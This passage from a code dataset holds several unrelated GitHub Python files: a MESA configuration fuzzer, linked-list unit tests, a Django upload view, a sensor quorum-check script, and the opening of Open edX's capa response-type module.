Score\n        f1 = f1_score(all_labels, all_preds, average='binary')  # you can choose other averaging methods\n        print(f'Epoch {epoch + 1}, Loss: {running_loss / len(train_loader)}, F1 Score: {f1:.4f}')\n\n    print('Finished Training')\n\n# 5. Evaluate the model\n# You may want to use a separate validation dataset to evaluate your model's performance","repo_name":"Alar-q/DysgraphiaRMAT","sub_path":"DevStageMesh/computerVisionAitu/scratch_nn.py","file_name":"scratch_nn.py","file_ext":"py","file_size_in_byte":5226,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"6509873274","text":"import numpy as np\nfrom subprocess import check_output, STDOUT\nimport numpy, time\nnumpy.random.seed(int(time.time()))\n\nmaxInt = 10\nbase_float = [1e-4, 1, 1e2, 1e10]\nbool_opts = ['.false.', '.true.']\n\ndef make_int():\n\treturn str(np.random.randint(2*maxInt+1) - maxInt)\n\ndef make_float():\n\tbase_val = np.random.choice(base_float)\n\treturn str(np.random.randn() * base_val)\n\ndef make_bool():\n\treturn np.random.choice(bool_opts)\n\ndef make_val(prototype):\n\tkind = value_classifier(prototype)\n\tif kind == 'bool':\n\t\treturn make_bool()\n\telif kind == 'float':\n\t\treturn make_float()\n\telse:\n\t\treturn make_int()\n\ndef make_inlist(fname, star_job, controls):\n\tfi = open(fname, 'w+')\n\n\tfi.write('&star_job\\n')\n\tfi.write(star_job)\n\tfi.write('\\n/ !end of star_job\\n')\n\n\tfi.write('&controls\\n')\n\tfi.write(controls)\n\tfi.write('\\n/ ! end of controls\\n')\n\n\tfi.close()\n\ndef make_directory(dirName):\n\tcheck_output('cp -R prototype ' + dirName, shell=True)\n\tcheck_output('cd ' + dirName + '; ./clean; ./mk', shell=True)\n\ndef run_MESA(dirName, timeout=10, timeout_command='gtimeout'):\n\ttry:\n\t\tout = check_output('cd ' + dirName + '; ' + timeout_command + ' ' + str(timeout) + ' \"./rn\"', shell=True, stderr=STDOUT)\n\texcept Exception as e:\n\t\tout = e.output\n\treturn out\n\ndef value_classifier(opt):\n\tif opt == '.false.' 
or opt == '.true.':\n\t\treturn 'bool'\t\n\n\tif '\\'' in opt or '\\\"' in opt:\n\t\treturn 'string'\n\n\topt = opt.replace('d', 'e+')\n\n\ttry:\n\t\tx = int(opt)\n\t\treturn 'int'\n\texcept:\n\t\ttry:\n\t\t\tx = np.float(opt)\n\t\t\treturn 'float'\n\t\texcept:\n\t\t\treturn 'string'\n\ndef parse_defaults(fname):\n\tfi = open(fname, 'r')\n\topts = []\n\tvals = []\n\tfor line in fi:\n\t\tx = line.lstrip()\n\t\tx = x.strip('\\n')\n\t\tif len(x) == 0 or x[0] == '!':\n\t\t\tcontinue\n\n\t\tx = x.split('=')\n\n\t\topt = x[0].strip()\n\n\t\tif '(' in opt or ')' in opt:\n\t\t\tcontinue\n\n\t\tval = x[1].lstrip()\n\t\tval = val.split(' ')\n\t\tval = val[0]\n\t\tval = val.strip()\n\n\t\topts.append(opt)\n\t\tvals.append(val)\n\n\treturn opts, vals\n\ndef make_controls(opts, vals, indices, mandatory_controls):\n\tcontrols = ''\n\tfor i in indices:\n\t\topt = opts[i]\n\t\tval = vals[i]\n\n\t\t# Filtering to avoid playing with silly options\n\t\tif 'read_extra' in opt:\n\t\t\tcontinue\n\n\t\tif value_classifier(val) != 'string':\n\t\t\tcontrols = controls + opt + ' = ' + make_val(val) + '\\n'\n\n\tcontrols = controls + mandatory_controls\n\n\treturn controls\n\ncopt, cval = parse_defaults('controls.defaults')\nsopt, sval = parse_defaults('star_job.defaults')\nmake_directory('trial')\nmandatory_controls = 'report_ierr = .true.\\n'\nbad_strings = ['failed', 'nan', 'error']\nrepeats = 5\ncounter = 0\n\nfrom itertools import combinations\n\nfor r in range(len(copt)):\n\tcomb = combinations(range(len(copt)), r)\n\tfor i,indices in enumerate(comb):\n\t\tfor r in range(repeats):\n\t\t\tcontrols = make_controls(copt, cval, indices, mandatory_controls)\n\t\t\tstar_job = make_controls(sopt, sval, [], '')\n\n\t\t\tmake_inlist('trial/inlist_project', star_job, controls)\n\t\t\tout = run_MESA('trial', timeout=10, timeout_command='gtimeout')\n\t\t\tout = str(out)\n\t\t\tout = out.replace('\\\\n','\\n')\n\t\t\tcounter += 1\n\n\t\t\tfor bs in bad_strings:\n\t\t\t\tif bs in out.lower():\n\t\t\t\t\tprint('Bad string detected in trial ' + str(counter) + ':', bs)\n\t\t\t\t\tcontrols = \"\\n\".join([ll.rstrip() for ll in controls.splitlines() if ll.strip()])\n\t\t\t\t\tstar_job = \"\\n\".join([ll.rstrip() for ll in star_job.splitlines() if ll.strip()])\n\t\t\t\t\tprint(controls)\n\t\t\t\t\tprint(star_job)\n#\t\t\t\t\tprint(out)\n\t\t\t\t\tprint('--------------------------------')","repo_name":"adamjermyn/MESA_Fuzzer","sub_path":"fuzzer.py","file_name":"fuzzer.py","file_ext":"py","file_size_in_byte":3423,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} +{"seq_id":"30703294804","text":"# -*- coding: utf-8 -*-\n\"\"\"Tests for double.py.\"\"\"\nfrom __future__ import unicode_literals\n\nimport pytest\nfrom double import DNode, DList\n\n\nTYPE_TABLE = [\n '1',\n 1,\n '-' * 10000,\n 'āĕijœ',\n '',\n b'1234',\n '12345\\t',\n [1, 2, 3],\n (1, 2, 3)\n]\n\nTABLE_LENGTHS = [\n (['a'], \"(a)\"),\n (['a', ' b'], \"(b, a)\"),\n (['a', 'b', 'c'], \"(c, b, a)\"),\n (('a b c ' * 5).split(), \"(c, b, a, c, b, a, c, b, a, c, b, a, c, b, a)\"),\n ([], None)\n]\n\nLONG_LIST = ('a b c ' * 10000).split()\n\nSEARCH_TABLE = [\n (['a'], 'a', True),\n (['1'], '1', True),\n ([], '1', False),\n ([1, 2, 3], 1, True),\n ([1, 2, 3], '1', False),\n ([1, 2, 3], 4, False),\n ([[1, 2], 3], 1, False),\n ([[1, 2], 3], [1, 2], True),\n ([1, 2, 3], None, False),\n ([1, 2, 3, 2], 2, True),\n ([1] + LONG_LIST, 1, True),\n (LONG_LIST + [1], 1, True),\n (TYPE_TABLE, b'1234', True),\n (TYPE_TABLE, 'āĕijœ', True),\n 
(TYPE_TABLE, '12345\\t', True),\n (TYPE_TABLE, (1, 2, 3), True),\n]\n\n# DNode Tests\n\n\n@pytest.mark.parametrize('init_value', TYPE_TABLE)\ndef test_dnode_init_value(init_value):\n \"\"\"Test that the values initialize correctly.\"\"\"\n test_dnode = DNode(init_value)\n assert test_dnode.value == init_value\n\n\ndef test_dnode_init_next_node():\n \"\"\"Test that the next_node pointer initializes correctly.\"\"\"\n test_dnode = DNode('test')\n assert test_dnode.next_node is None\n\n\ndef test_dnode_init_prev_node():\n \"\"\"Test that the prev_node pointer initializes correctly.\"\"\"\n test_dnode = DNode('test')\n assert test_dnode.prev_node is None\n\n\ndef test_dnode_next_node():\n \"\"\"Test that the next node pointer returns the correct node.\"\"\"\n test_dnode = DNode('test')\n second_dnode = DNode('second_node', test_dnode)\n assert second_dnode.next_node == test_dnode\n\n\ndef test_dnode_pointer():\n \"\"\"Test that the previous node pointer returns the correct node.\"\"\"\n test_dnode = DNode('test')\n second_node = DNode('second_node', prev_node=test_dnode)\n assert second_node.prev_node == test_dnode\n\n# DList Tests\n\n\ndef test_empty_list_length():\n \"\"\"Test to see if any empty string has length zero.\"\"\"\n empty_list = DList()\n assert empty_list.length == 0\n\n\ndef test_empty_list_head():\n \"\"\"Test to see if in an empty list the head is none.\"\"\"\n empty_list = DList()\n assert empty_list.head is None\n\n\ndef test_empty_list_tail():\n \"\"\"Test to see if in an empty list the tail is none.\"\"\"\n empty_list = DList()\n assert empty_list.tail is None\n\n\n@pytest.mark.parametrize('init_value', TYPE_TABLE)\ndef test_list_push_empty(init_value):\n \"\"\"Test push on an empty list.\"\"\"\n test_list = DList()\n test_list.push(init_value)\n assert test_list.head.value == init_value\n\n\ndef test_list_push_head_value():\n \"\"\"Test push on a non-empty list. Make sure pushing to head.\"\"\"\n test_list = DList()\n test_list.push('first_node')\n test_list.push('second_node')\n assert test_list.head.value == 'second_node'\n\n\n@pytest.mark.parametrize('init_value', TYPE_TABLE)\ndef test_list_append_empty(init_value):\n \"\"\"Test append on an empty list.\"\"\"\n test_list = DList()\n test_list.append(init_value)\n assert test_list.tail.value == init_value\n\n\ndef test_list_append_tail_value():\n \"\"\"Test append on a non-empty list. Make sure appending to tail.\"\"\"\n test_list = DList()\n test_list.append('first_node')\n test_list.append('second_node')\n assert test_list.tail.value == 'second_node'\n\n\ndef test_list_push_next():\n \"\"\"Test push on a non-empty list. Make sure that next pointer is initializing correctly.\"\"\"\n test_list = DList()\n test_list.push('test_string')\n test_list.push('second_node')\n assert test_list.head.next_node.value == 'test_string'\n\n\n@pytest.mark.parametrize('init_list, result', TABLE_LENGTHS)\ndef test_push_length(init_list, result):\n \"\"\"Test length is correct after a push.\"\"\"\n test_list = DList(init_list)\n test_list.push('some_string')\n assert test_list.length == len(init_list) + 1\n\n\ndef test_list_append_next():\n \"\"\"Test append on a non-empty list. 
Make sure that next pointer is initializing correctly.\"\"\"\n    test_list = DList()\n    test_list.append('test_string')\n    test_list.append('second_node')\n    assert test_list.tail.prev_node.value == 'test_string'\n\n\ndef test_append_length():\n    \"\"\"Test length is correct after an append.\"\"\"\n    test_list = DList(['a', 'b', 'c'])\n    test_list.append('some_string')\n    assert test_list.length == 4\n\n\n@pytest.mark.parametrize('init_value', TYPE_TABLE)\ndef test_pop(init_value):\n    \"\"\"Test pop returns correct value.\"\"\"\n    test_list = DList()\n    test_list.push(init_value)\n    assert test_list.pop() == init_value\n\n\ndef test_pop_empty():\n    \"\"\"Test that popping an empty list returns None.\"\"\"\n    test_list = DList()\n    assert test_list.pop() is None\n\n\ndef test_pop_length():\n    \"\"\"Test length is correct after a pop. If pop a zero length list, should still be 0.\"\"\"\n    test_list = DList(['a', 'b', 'c'])\n    test_list.pop()\n    assert test_list.length == 2\n\n\n@pytest.mark.parametrize('init_value', TYPE_TABLE)\ndef test_shift(init_value):\n    \"\"\"Test shift returns correct value.\"\"\"\n    test_list = DList()\n    test_list.append(init_value)\n    assert test_list.shift() == init_value\n\n\ndef test_shift_empty():\n    \"\"\"Test that shifting an empty list returns None.\"\"\"\n    test_list = DList()\n    assert test_list.shift() is None\n\n\ndef test_shift_length():\n    \"\"\"Test length is correct after a shift. If shift a zero length list, should still be 0.\"\"\"\n    test_list = DList(['a', 'b', 'c'])\n    test_list.shift()\n    assert test_list.length == 2\n\n\ndef test_size_xl():\n    \"\"\"Test init and size on an xl list.\"\"\"\n    test_list = DList(LONG_LIST)\n    assert test_list.size() == 30000\n\n\n@pytest.mark.parametrize('init_list, search_val, val_is_expected', SEARCH_TABLE)\ndef test_search(init_list, search_val, val_is_expected):\n    \"\"\"Test search returns the node holding the value, or raises when absent.\"\"\"\n    test_list = DList(init_list)\n    if val_is_expected:\n        assert test_list.search(search_val).value == search_val\n    else:\n        with pytest.raises(IndexError):\n            test_list.search(search_val)\n\n\ndef test_remove_node_length():\n    \"\"\"Test length is correct after a remove.\"\"\"\n    test_list = DList(['a', 'b', 'c'])\n    node_to_remove = test_list.search('c')\n    test_list.remove_node(node_to_remove)\n    assert test_list.length == 2\n","repo_name":"jefferyrayrussell/data-structures","sub_path":"src/test_double.py","file_name":"test_double.py","file_ext":"py","file_size_in_byte":6428,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"71476172562","text":"from django.shortcuts import render,redirect\nfrom django.http import HttpResponse\nimport time\nfrom .models import LunBo\nfrom .forms import PhotoForm\n# Create your views here.\n\ndef upload_image(request):\n    if request.method == 'POST':\n        form = PhotoForm(request.POST,request.FILES)\n        if form.is_valid():\n            # check whether a file was uploaded\n\n            if 'docfile' in request.FILES:\n                image = request.FILES[\"docfile\"]\n\n                # rename the file\n                image.name = str(request.user)+str(time.time())+'.jpg'\n\n                s = LunBo()\n                s.name = form.cleaned_data[\"name\"]\n                s.owner = request.user\n                s.description = form.cleaned_data[\"description\"]\n                s.image = form.cleaned_data[\"image\"]\n                s.save()\n                return HttpResponse('Upload succeeded')\n            else:\n                # no file was uploaded but upload was clicked, so redirect back to the upload page\n                return redirect('lunbo/upload_img.html')\n        else:\n\n            image = None\n            return HttpResponse('Upload failed')\n    else:\n        return 
render(request, 'lunbo/upload_img.html')\n\n","repo_name":"lmh246/software-engineering","sub_path":"project/lunbo/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1176,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"31206843970","text":"import os\nimport sys\nimport datetime\n\nsys.path.insert(0, os.path.abspath(os.path.join(os.path.dirname(__file__), \"..\")))\nimport controller.modules.const as CONST # Operating Values that may need to be tweaked moved to separate file in includes.\nfrom controller.modules.AHT20 import AHT20 # Lib for AHT20 sensors\nimport controller.modules.TCA9548A as TCA9548 # Lib for I2C MUX\n\n\ndef quorum_check(value_x, value_y, value_z, delta_max):\n \"\"\"\n Quorum Checking function\n Requires 3 input values and a max allowed delta between sensors as args.\n Checks all 3 values against each other and the max delta to determine if a sensor has\n failed or is way out of agreement with the other two.\n Returns a \"Return Code\" and a value.\n Return Codes:\n 0 - All sensors agree,\n 1 - sensor x out of spec,\n 2 - sensor y out of spec,\n 3 - sensor z out of spec,\n 4 - no sensors agree, you should error out/email/alarm/etc.\n 5 - sensors agree in pairs but spread across all 3 exceeds delta\n \"\"\"\n # Reset values\n agree_xy = False\n agree_xz = False\n agree_yz = False\n\n x_min = value_x - delta_max\n x_max = value_x + delta_max\n y_min = value_y - delta_max\n y_max = value_y + delta_max\n\n # Check for agreement between pairs\n if x_min <= value_y <= x_max:\n agree_xy = True\n if x_min <= value_z <= x_max:\n agree_xz = True\n if y_min <= value_z <= y_max:\n agree_yz = True\n\n # Evaluate if all sensors either disagree or agree\n if not (agree_xy) and not (agree_xz) and not (agree_yz):\n val = 0\n return_val = [4, val]\n return return_val # Set this to return error code stating none of the sensors agree\n\n if agree_xy and agree_xz and agree_yz:\n val = (value_x + value_y + value_z) / 3\n val = round(val, 1)\n return_val = [0, val]\n return (\n return_val # Set this to return all good code and average of all 3 sensors\n )\n\n # Catch edge case of agreement between two separate pairs but not the third.\n # For this case also return an average of all 3.\n if (\n (agree_xy and agree_yz and not agree_xz)\n or (agree_yz and agree_xz and not agree_xy)\n or (agree_xy and agree_xz and not agree_yz)\n ):\n val = (value_x + value_y + value_z) / 3\n val = round(val, 1)\n return_val = [5, val]\n return return_val # Set this to return all large spread code and average of all 3 sensors\n\n # If we flow through all the previous checks, identify which sensor is out of line with quorum.\n if agree_xy and not agree_yz and not agree_xz:\n val = (value_x + value_y) / 2\n val = round(val, 1)\n return_val = [3, val]\n return return_val # Set this to return one bad sensor code for sensor z and average of 2 remaining sensors\n\n if not agree_xy and agree_yz and not agree_xz:\n val = (value_y + value_z) / 2\n val = round(val, 1)\n return_val = [1, val]\n return return_val # Set this to return one bad sensor code for sensor x and average of 2 remaining sensors\n\n if not agree_xy and not agree_yz and agree_xz:\n val = (value_x + value_z) / 2\n val = round(val, 1)\n return_val = [2, val]\n return return_val # Set this to return one bad sensor code for sensor y and average of 2 remaining sensors\n\n\n
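# Worked example of the return codes above (hypothetical readings, delta_max=0.5):\n# quorum_check(21.0, 21.2, 25.0, 0.5) -> [3, 21.1]\n# x and y agree within 0.5 of each other, z matches neither, so code 3 flags\n# sensor z and the value is the average of x and y, rounded to 1 place.\n\n\n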
def get_sensor_data():\n \"\"\"\n Get Sensor Data\n In this block we will read 3 temp/humidity sensors, call the quorum\n function and report readings and/or error conditions. We require the MUX\n lane (1/2/3/4/5/6/7/8) for sensors A/B/C set in the globals as well as max\n drift between two sensors beyond which we consider a sensor to be in error.\n Select the appropriate mux port for each AHT20 sensor then read the values,\n check for quorum, return values.\n DEV NOTE: Remember to set handling for exceptional errors.\n \"\"\"\n TCA9548.i2c_mux_channel(\n I2CBus=CONST.I2C_BUS,\n multiplexer_addr=CONST.I2C_MUX_ADDR,\n i2c_channel_setup=CONST.AHTX_MUX_CHAN,\n debug_status=CONST.DEBUG_STATUS,\n )\n sensor_a = AHT20(I2CBusNum=CONST.I2C_BUS)\n sensor_a_hum = sensor_a.get_humidity()\n sensor_a_temp = sensor_a.get_temperature()\n\n TCA9548.i2c_mux_channel(\n I2CBus=CONST.I2C_BUS,\n multiplexer_addr=CONST.I2C_MUX_ADDR,\n i2c_channel_setup=CONST.AHTY_MUX_CHAN,\n debug_status=CONST.DEBUG_STATUS,\n )\n sensor_b = AHT20(I2CBusNum=CONST.I2C_BUS)\n sensor_b_hum = sensor_b.get_humidity()\n sensor_b_temp = sensor_b.get_temperature()\n\n TCA9548.i2c_mux_channel(\n I2CBus=CONST.I2C_BUS,\n multiplexer_addr=CONST.I2C_MUX_ADDR,\n i2c_channel_setup=CONST.AHTZ_MUX_CHAN,\n debug_status=CONST.DEBUG_STATUS,\n )\n sensor_c = AHT20(I2CBusNum=CONST.I2C_BUS)\n sensor_c_hum = sensor_c.get_humidity()\n sensor_c_temp = sensor_c.get_temperature()\n\n last_sensor_read_time = datetime.datetime.now()\n\n temp_check = quorum_check(\n sensor_a_temp, sensor_b_temp, sensor_c_temp, CONST.MAX_TEMP_SENSOR_DRIFT\n )\n hum_check = quorum_check(\n sensor_a_hum, sensor_b_hum, sensor_c_hum, CONST.MAX_HUMI_SENSOR_DRIFT\n )\n\n if temp_check[0] == 0:\n # All sensors agree\n return_temp = temp_check[1]\n return_temp_code = \"Good\"\n if temp_check[0] == 1:\n # Sensor X Bad\n return_temp = temp_check[1]\n return_temp_code = \"Sensor X Disagrees\"\n sys.stderr.write(\"Temperature Sensor X disagrees with other two.\")\n if temp_check[0] == 2:\n # Sensor Y Bad\n return_temp = temp_check[1]\n return_temp_code = \"Sensor Y Disagrees\"\n sys.stderr.write(\"Temperature Sensor Y disagrees with other two.\")\n if temp_check[0] == 3:\n # Sensor Z Bad\n return_temp = temp_check[1]\n return_temp_code = \"Sensor Z Disagrees\"\n sys.stderr.write(\"Temperature Sensor Z disagrees with other two.\")\n if temp_check[0] == 4:\n # No sensors agree\n return_temp = 0\n return_temp_code = \"No Sensors Agree\"\n sys.stderr.write(\"None of the Temperature Sensors agree.\")\n if temp_check[0] == 5:\n # 2 pair agreement, spread > MAX_DRIFT but average usable\n return_temp = temp_check[1]\n return_temp_code = \"Large Spread\"\n sys.stderr.write(\n \"Range Across All Temperature Sensors exceeds max delta but pairs good.\"\n )\n\n if hum_check[0] == 0:\n # All sensors agree\n return_hum = hum_check[1]\n return_hum_code = \"Good\"\n if hum_check[0] == 1:\n # Sensor X Bad\n return_hum = hum_check[1]\n return_hum_code = \"Sensor X Disagrees\"\n sys.stderr.write(\"Humidity Sensor X disagrees with other two.\")\n if hum_check[0] == 2:\n # Sensor Y Bad\n return_hum = hum_check[1]\n return_hum_code = \"Sensor Y Disagrees\"\n sys.stderr.write(\"Humidity Sensor Y disagrees with other two.\")\n if hum_check[0] == 3:\n # Sensor Z Bad\n return_hum = hum_check[1]\n return_hum_code = \"Sensor Z Disagrees\"\n sys.stderr.write(\"Humidity Sensor Z disagrees with other two.\")\n if hum_check[0] == 4:\n # No sensors agree\n return_hum = 0\n return_hum_code = \"No Sensors Agree\"\n sys.stderr.write(\"None of the Humidity Sensors agree.\")\n if hum_check[0] == 5:\n # 2 pair agreement, spread > MAX_DRIFT but 
average usable\n return_hum = hum_check[1]\n return_hum_code = \"Large Spread\"\n sys.stderr.write(\n \"Range Across All Humidity Sensors exceeds max delta but pairs good.\"\n )\n\n return (\n last_sensor_read_time,\n return_temp_code,\n return_temp,\n return_hum_code,\n return_hum,\n )\n\n\n# Read Sensors\n(\n last_sensor_read_time,\n read_temp_code,\n read_temp,\n read_hum_code,\n read_hum,\n) = get_sensor_data()\n\nprint(\n \"Temp Quorum is \"\n + str(read_temp)\n + \" degrees with code '\"\n + str(read_temp_code)\n + \"' at \"\n + str(last_sensor_read_time)\n + \".\"\n)\nprint(\n \"Humidity Quorum is \"\n + str(read_hum)\n + \"% with code '\"\n + str(read_hum_code)\n + \"' at \"\n + str(last_sensor_read_time)\n + \".\"\n)\n","repo_name":"PedanticAvenger/SBCuterie","sub_path":"tests/readsensors.py","file_name":"readsensors.py","file_ext":"py","file_size_in_byte":8232,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"12618026613","text":"\"\"\"\nProblem response evaluation. Handles checking of student responses,\nof a variety of types.\n\nUsed by capa_problem.py\n\"\"\"\n# standard library imports\nimport abc\nimport inspect\nimport json\nimport logging\nimport numbers\nimport re\nimport sys\nimport textwrap\nimport traceback\nfrom cmath import isnan\nfrom collections import namedtuple\nfrom datetime import datetime\nfrom sys import float_info\n\nimport html5lib\nimport numpy\nimport random2 as random\nimport requests\nimport six\n# specific library imports\nfrom calc import UndefinedVariable, UnmatchedParenthesis, evaluator\nfrom django.utils import html\n\nfrom lxml import etree\nfrom lxml.html.soupparser import fromstring as fromstring_bs # uses Beautiful Soup!!! FIXME?\nfrom pyparsing import ParseException\nfrom pytz import UTC\nfrom shapely.geometry import MultiPoint, Point\nfrom six.moves import map, range, zip\n\nimport xmodule.capa.safe_exec as safe_exec\nimport xmodule.capa.xqueue_interface as xqueue_interface\nfrom openedx.core.djangolib.markup import HTML, Text\nfrom openedx.core.lib.grade_utils import round_away_from_zero\n\nfrom . import correctmap\nfrom .registry import TagRegistry\nfrom .util import (\n compare_with_tolerance,\n contextualize_text,\n convert_files_to_filenames,\n default_tolerance,\n find_with_default,\n get_course_id_from_capa_block,\n get_inner_html_from_xpath,\n is_list_of_files\n)\n\nlog = logging.getLogger(__name__)\n\nregistry = TagRegistry()\n\nCorrectMap = correctmap.CorrectMap\nCORRECTMAP_PY = None\n\n# Make '_' a no-op so we can scrape strings. 
Using lambda instead of\n# `django.utils.translation.ugettext_noop` because Django cannot be imported in this file\n_ = lambda text: text\n\nQUESTION_HINT_CORRECT_STYLE = 'feedback-hint-correct'\nQUESTION_HINT_INCORRECT_STYLE = 'feedback-hint-incorrect'\nQUESTION_HINT_LABEL_STYLE = 'hint-label'\nQUESTION_HINT_TEXT_STYLE = 'hint-text'\nQUESTION_HINT_MULTILINE = 'feedback-hint-multi'\n\n#-----------------------------------------------------------------------------\n# Exceptions\n\n\nclass LoncapaProblemError(Exception):\n \"\"\"\n Error in specification of a problem\n \"\"\"\n pass # lint-amnesty, pylint: disable=unnecessary-pass\n\n\nclass ResponseError(Exception):\n \"\"\"\n Error for failure in processing a response, including\n exceptions that occur when executing a custom script.\n \"\"\"\n pass # lint-amnesty, pylint: disable=unnecessary-pass\n\n\nclass StudentInputError(Exception):\n \"\"\"\n Error for an invalid student input.\n For example, submitting a string when the problem expects a number\n \"\"\"\n pass # lint-amnesty, pylint: disable=unnecessary-pass\n\n#-----------------------------------------------------------------------------\n#\n# Main base class for CAPA responsetypes\n\n\nclass LoncapaResponse(six.with_metaclass(abc.ABCMeta, object)):\n \"\"\"\n Base class for CAPA responsetypes. Each response type (ie a capa question,\n which is part of a capa problem) is represented as a subclass,\n which should provide the following methods:\n\n - get_score : evaluate the given student answers, and return a CorrectMap\n - get_answers : provide a dict of the expected answers for this problem\n\n Each subclass must also define the following attributes:\n\n - tags : xhtml tags identifying this response (used in auto-registering)\n\n In addition, these methods are optional:\n\n - setup_response : find and note the answer input field IDs for the response; called\n by __init__\n\n - check_hint_condition : check to see if the student's answers satisfy a particular\n condition for a hint to be displayed\n\n - render_html : render this Response as HTML (must return XHTML-compliant string)\n - __str__ : unicode representation of this Response\n\n Each response type may also specify the following attributes:\n\n - max_inputfields : (int) maximum number of answer input fields (checked in __init__\n if not None)\n\n - allowed_inputfields : list of allowed input fields (each a string) for this Response\n\n - required_attributes : list of required attributes (each a string) on the main\n response XML stanza\n\n - hint_tag : xhtml tag identifying hint associated with this response inside\n hintgroup\n \"\"\"\n\n tags = None\n hint_tag = None\n has_partial_credit = False\n credit_type = []\n\n max_inputfields = None\n allowed_inputfields = []\n required_attributes = []\n\n # Overridable field that specifies whether this capa response type has support for\n # for rendering on devices of different sizes and shapes.\n # By default, we set this to False, allowing subclasses to override as appropriate.\n multi_device_support = False\n\n def __init__(self, xml, inputfields, context, system, capa_block, minimal_init):\n \"\"\"\n Init is passed the following arguments:\n\n - xml : ElementTree of this Response\n - inputfields : ordered list of ElementTrees for each input entry field in this Response\n - context : script processor context\n - system : LoncapaSystem instance which provides OS, rendering, and user context\n - capa_block : Capa block, to access runtime\n \"\"\"\n self.xml = xml\n 
self.inputfields = inputfields\n self.context = context\n self.capa_system = system\n self.capa_block = capa_block # njp, note None\n\n self.id = xml.get('id')\n\n # The LoncapaProblemError messages here do not need to be translated as they are\n # only displayed to the user when settings.DEBUG is True\n for abox in inputfields:\n if abox.tag not in self.allowed_inputfields:\n msg = \"%s: cannot have input field %s\" % (\n str(self), abox.tag)\n msg += \"\\nSee XML source line %s\" % getattr(\n xml, 'sourceline', '[unavailable]')\n raise LoncapaProblemError(msg)\n\n if self.max_inputfields and len(inputfields) > self.max_inputfields:\n msg = \"%s: cannot have more than %s input fields\" % (\n str(self), self.max_inputfields)\n msg += \"\\nSee XML source line %s\" % getattr(\n xml, 'sourceline', '[unavailable]')\n raise LoncapaProblemError(msg)\n\n for prop in self.required_attributes:\n if not xml.get(prop):\n msg = \"Error in problem specification: %s missing required attribute %s\" % (\n str(self), prop)\n msg += \"\\nSee XML source line %s\" % getattr(\n xml, 'sourceline', '[unavailable]')\n raise LoncapaProblemError(msg)\n\n # ordered list of answer_id values for this response\n self.answer_ids = [x.get('id') for x in self.inputfields]\n if self.max_inputfields == 1:\n # for convenience\n self.answer_id = self.answer_ids[0]\n\n # map input_id -> maxpoints\n self.maxpoints = {}\n for inputfield in self.inputfields:\n # By default, each answerfield is worth 1 point\n maxpoints = inputfield.get('points', '1')\n self.maxpoints.update({inputfield.get('id'): int(maxpoints)})\n\n if not minimal_init:\n # dict for default answer map (provided in input elements)\n self.default_answer_map = {}\n for entry in self.inputfields:\n answer = entry.get('correct_answer')\n if answer:\n self.default_answer_map[entry.get(\n 'id')] = contextualize_text(answer, self.context)\n\n # Does this problem have partial credit?\n # If so, what kind? Get it as a list of strings.\n partial_credit = xml.xpath('.')[0].get('partial_credit', default=False)\n\n if str(partial_credit).lower().strip() == 'false':\n self.has_partial_credit = False\n self.credit_type = []\n else:\n self.has_partial_credit = True\n self.credit_type = partial_credit.split(',')\n self.credit_type = [word.strip().lower() for word in self.credit_type]\n\n if hasattr(self, 'setup_response'):\n self.setup_response()\n\n def get_max_score(self):\n \"\"\"\n Return the total maximum points of all answer fields under this Response\n \"\"\"\n return sum(self.maxpoints.values())\n\n def render_html(self, renderer, response_msg=''):\n \"\"\"\n Return XHTML Element tree representation of this Response.\n\n Arguments:\n\n - renderer : procedure which produces HTML given an ElementTree\n - response_msg: a message displayed at the end of the Response\n \"\"\"\n _ = self.capa_system.i18n.gettext\n\n # response_id = problem_id + response index\n response_id = self.xml.attrib['id']\n\n response_index = response_id.split('_')[-1]\n # Translators: index here could be 1,2,3 and so on\n response_label = _('Question {index}').format(index=response_index)\n\n # wrap the content inside a section\n tree = etree.Element('div')\n tree.set('class', 'wrapper-problem-response')\n tree.set('tabindex', '-1')\n tree.set('aria-label', response_label)\n tree.set('role', 'group')\n\n if self.xml.get('multiple_inputtypes'):\n # add
<div> to wrap all inputtypes\n content = etree.SubElement(tree, 'div')\n content.set('class', 'multi-inputs-group')\n content.set('role', 'group')\n\n if self.xml.get('multiinput-group-label-id'):\n content.set('aria-labelledby', self.xml.get('multiinput-group-label-id'))\n\n if self.xml.get('multiinput-group_description_ids'):\n content.set('aria-describedby', self.xml.get('multiinput-group_description_ids'))\n else:\n content = tree\n\n # problem author can make this span display:inline\n if self.xml.get('inline', ''):\n tree.set('class', 'inline')\n\n for item in self.xml:\n # call provided procedure to do the rendering\n item_xhtml = renderer(item)\n if item_xhtml is not None:\n content.append(item_xhtml)\n tree.tail = self.xml.tail\n\n # Add a <div>
for the message at the end of the response\n if response_msg:\n content.append(self._render_response_msg_html(response_msg))\n\n return tree\n\n def evaluate_answers(self, student_answers, old_cmap):\n \"\"\"\n Called by capa_problem.LoncapaProblem to evaluate student answers, and to\n generate hints (if any).\n\n Returns the new CorrectMap, with (correctness,msg,hint,hintmode) for each answer_id.\n \"\"\"\n new_cmap = self.get_score(student_answers)\n self.get_hints(convert_files_to_filenames(\n student_answers), new_cmap, old_cmap)\n return new_cmap\n\n def make_hint_div(self, hint_node, correct, student_answer, question_tag,\n label=None, hint_log=None, multiline_mode=False, log_extra=None):\n \"\"\"\n Returns the extended hint div based on the student_answer\n or the empty string if, after processing all the arguments, there is no hint.\n As a side effect, logs a tracking log event detailing the hint.\n\n Keyword args:\n * hint_node: xml node such as <optionhint>, holding extended hint text. May be passed in as None.\n * correct: bool indication if the student answer is correct\n * student_answer: list length 1 or more of string answers\n (only checkboxes make multiple answers)\n * question_tag: string name of enclosing question, e.g. 'choiceresponse'\n * label: (optional) if None (the default), extracts the label from the node,\n otherwise using this value. The value '' inhibits labeling of the hint.\n * hint_log: (optional) hints to be used, passed in as list-of-dict format (below)\n * multiline_mode: (optional) bool, default False, hints should be shown one-per line\n * log_extra: (optional) dict items to be injected in the tracking log\n\n There are many parameters to this method because a variety of extended hint contexts\n all bottleneck through here. In addition, the caller must provide detailed background\n information about the hint-trigger to go in the tracking log.\n\n hint_log format: list of dicts with each hint as a 'text' key. Each dict has extra\n information for logging, essentially recording the logic which triggered the feedback.\n Case 1: records which choices 